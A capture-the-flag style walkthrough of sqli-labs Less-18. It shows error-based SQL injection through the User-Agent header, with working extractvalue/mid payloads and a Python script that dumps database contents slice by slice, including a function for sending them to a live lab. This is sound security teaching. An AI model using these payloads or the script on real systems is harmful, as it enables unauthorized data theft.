posture
This level is error-based SQL injection through the User-Agent header: the login form is submitted by POST, but the injection point is the request header rather than a form parameter, so the POC has to be constructed in the User-Agent value instead of after the parameters.
For the principle and attack posture of error-based injection, refer to: [Network Security] sqli-labs Less-5 Problem-solving Analysis
This level is solved by capturing the login request and editing its User-Agent header before forwarding it.
Determine the type of injection
The error echo shows that the injection context is a single quote inside parentheses, that is, (') injection.
The injection template is therefore ',1,1)#
The User-Agent is the first of three values in the INSERT statement that records it, so the single quote closes the string, the two 1 values fill the remaining columns, the ) closes the VALUES tuple, and # comments out the rest of the statement.
Lookup table name
We replace the first 1 (the position right after the opening quote) with the error-generating expression and construct the POC as follows:
',extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'))),1)#
The error message returns the four table names.
Check column name
',extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))),1)#
Check the data
First, a short introduction to the mid() function.
MID() is a string function that extracts a substring from a given string. Its syntax is:
MID(str, start, length)
where str is the source string to extract from, start is the position of the first character to extract (counted from 1), and length is the number of characters to extract from that position onward.
For example, to extract the substring "World" from "Hello, World!", use the following MID() call:
MID("Hello, World!", 8, 5)
Here str is "Hello, World!", start is 8 and length is 5, so MID() extracts the 5 characters beginning at the 8th character and returns "World". (MySQL's SUBSTR() and SUBSTRING() take the same arguments and work just as well in the POC.)
Let's take the username column as an example, and use the mid() function to construct the POC as follows:
',extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),1,32))),1)#
This statement reads the username column of the security.users table, but not all of the usernames at once: mid() takes a slice of length 32 starting at the first character. The reason for slicing is that MySQL shows at most 32 characters of the string in an XPATH syntax error, and one of those is taken up by the 0x23 (#) marker, which is there to make the XPath parse fail at character 1 so the echo starts from the beginning of our data. Each request therefore reveals 31 characters of the result.
Next, we extract the slice that starts at the 32nd character, the first one not yet shown:
The POC is as follows:
',extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),32,32))),1)#
Similarly, the next slice starts at 63 (the start positions advance by 31: 1, 32, 63, ...), and we continue until the echoed slice is shorter than 31 characters, which means the end of the data has been reached.
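The table-name, column-name and username POCs above all follow the same pattern, and the 31-characters-per-request walk is tedious to do by hand. The following script is an added example (not code from the original writeup or from sqli-labs) that builds the User-Agent payload, parses the XPATH syntax error out of the response and advances the mid() offset until the data is exhausted. The lab is replaced by a simulated target with constructed sample rows so the script runs offline; the http_target() function shows the assumed request shape for a real Less-18 instance (form fields uname, passwd, submit and the credentials admin/admin are assumptions for that function only).

```python
import re

# Added example, not code from the original writeup. It automates the
# 31-characters-per-request extraction described above. `simulated_target`
# stands in for the Less-18 page so the script runs offline; `http_target`
# shows how the same send() function would talk to a real lab instance.

CHUNK = 32                  # MySQL shows at most 32 characters of an XPATH syntax error
MARKER = "#"                # 0x23 in the POC: forces the XPath error at character 1
STEP = CHUNK - len(MARKER)  # so only 31 characters of the subquery result are visible

XPATH_ERR = re.compile(r"XPATH syntax error: '([^']*)'")


def build_payload(subquery, start, length=CHUNK):
    """User-Agent value for one slice. The template ',1,1)# closes the VALUES
    tuple of the INSERT that records the User-Agent; the first literal is
    replaced by extractvalue() over a mid() slice of the subquery result."""
    return f"',extractvalue(1,concat(0x23,mid(({subquery}),{start},{length}))),1)#"


def parse_chunk(body):
    """Return the characters echoed after the marker, or None if no XPATH error."""
    m = XPATH_ERR.search(body)
    if not m or not m.group(1).startswith(MARKER):
        return None
    return m.group(1)[len(MARKER):]


def dump(subquery, send):
    """Walk the result in 31-character slices until a short (or empty) slice."""
    pieces, start = [], 1
    while True:
        chunk = parse_chunk(send(build_payload(subquery, start)))
        if not chunk:          # no error echoed, or nothing left past `start`
            break
        pieces.append(chunk)
        if len(chunk) < STEP:  # last slice
            break
        start += STEP          # 1, 32, 63, ... (not 1, 32, 64)
    return "".join(pieces)


# --- offline stand-in for the lab -------------------------------------------
# Constructed sample rows modelled on the lab's security database; nothing is
# read from a real MySQL server.
SAMPLE_USERNAMES = ["Dumb", "Angelina", "Dummy", "secure", "stupid", "superman",
                    "batman", "admin", "admin1", "admin2", "admin3", "dhakkan", "admin4"]
SIMULATED_RESULTS = {
    "select group_concat(table_name) from information_schema.tables "
    "where table_schema='security'": "emails,referers,uagents,users",
    "select group_concat(username) from security.users": ",".join(SAMPLE_USERNAMES),
}
PAYLOAD_RE = re.compile(r"mid\(\((.*)\),(\d+),(\d+)\)")


def simulated_target(user_agent):
    """Echo what Less-18 would: the MySQL error with its text cut to 32 chars.
    Unknown subqueries just return the normal page (a simplification)."""
    m = PAYLOAD_RE.search(user_agent)
    value = SIMULATED_RESULTS.get(m.group(1)) if m else None
    if value is None:
        return "<html>Your IP ADDRESS is: 127.0.0.1</html>"   # normal page, no error
    start, length = int(m.group(2)), int(m.group(3))
    piece = value[start - 1:start - 1 + length]                # mid() is 1-based
    return f"XPATH syntax error: '{(MARKER + piece)[:CHUNK]}'"


def http_target(url):
    """send() for a real instance: POST the login form with the payload as the
    User-Agent. Less-18 only records the header after a successful login, so
    valid credentials for that install are needed (assumed here: admin/admin;
    field names uname/passwd/submit are also an assumption)."""
    import urllib.parse
    import urllib.request

    def send(user_agent):
        form = urllib.parse.urlencode(
            {"uname": "admin", "passwd": "admin", "submit": "Submit"}).encode()
        req = urllib.request.Request(url, data=form, headers={"User-Agent": user_agent})
        with urllib.request.urlopen(req) as resp:
            return resp.read().decode(errors="replace")
    return send


if __name__ == "__main__":
    for q in SIMULATED_RESULTS:
        print(q, "->", dump(q, simulated_target))
```

dump() stops when a slice comes back shorter than 31 characters, so a result whose length is an exact multiple of 31 costs one extra request that returns only the marker; that is cheaper than guessing the length with length() beforehand and makes the stop condition independent of the data. To point it at a lab, pass http_target("http://host/sqli-labs/Less-18/") as the send argument.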
Summary
The above is the [Network Security] sqli-labs Less-18 problem-solving analysis, which exercises error-based injection and the use of the related functions; the [Network Security] sqli-labs Less-19 problem-solving analysis will be shared next.
I am Qiu said , see you next time.